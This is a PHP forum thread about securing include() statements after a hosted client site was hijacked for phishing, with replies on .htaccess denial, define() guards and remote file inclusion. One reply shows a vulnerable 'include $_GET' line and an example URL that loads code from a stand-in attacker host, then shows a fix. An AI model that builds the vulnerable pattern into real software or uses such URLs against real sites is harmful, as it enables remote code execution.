Hi all,

I really don't know much at all about using php. However I made a site for a client, probably about 6 pages. I created it at first using .html pages. I then renamed those to .php, and I created includes for the top and bottom menu leaving them as .html pages.

So the include code I used looks like this:
<?php include("includes/mainnav.html"); ?>
the 2nd include for the bottom menu looks similar

I also host my clients site, and recently found out that someone had setup a phishing site in some of the folders. The helpdesk are telling me:

If the include() statements do not check for sanitized input or only use local includes, they can be exploited very easily. These include() statements are the main target for remote file inclusion attacks that allow people to deface/hack domains.

If this is true, how then would I make this code safer? I assumed I was using something that was so basic that I never would have dreamed this would happen.

I suppose my second question might be, would you agree with what was said in this case as I described my pages, or do you think I need to look elsewhere for a possible cause?

Extremely grateful for any help with this!

    There are several ways to make includes more safe.

    If you can use .htaccess
    then make such a file, with this contents

    Deny from all

    and put it inside /includes/ folder.

    Another method can be used in .php pages
    In those index.php and other pages in your root folder
    you put this in the beginning

    <?php
define('MYCAR', true);
include("includes/mainnav.php");

//the rest

    and so in mainnav.php you put

    <?php
if(!defined('MYCAR')) exit('hacker!!!'); // stop the page
?>
<html>
<head>
etc
etc

    This method requires that you rename your .html pages into .php

      Thank you for your help!

      Pardon my ignorance, but what does 'MYCAR' refer to? :o

        I dont know ...
        You can use whatever.

        define('MYCAT', true);
        define('HUBERTHUMPHREY', true);

        It is like saying
        $name = true;
        $email = true;
        ... or whatever
        $handylandybopper = 3;
        echo $handylandybopper;

          The specific issue you quoted has more to do with including based on an external input, such as a value in the URL query string:

          include $_GET['name'];

          If the user submits the HTTP request for that page as something like [noparse]http://example.com/index.php?name=http://bad.example.com/malicious.php[/noparse], then you might get results you don't want. This probably does not apply in your stated case, as you are including a specific string literal for the file to be included, not a variable from an external input.

          If it does become a situation you need to deal with, I generally would do something like:

          $name = basename($_GET['name']);
include 'path/to/includes/' . $name . '.php';

          (With some other error-handling to deal with non-existing file names)

            Write a Reply...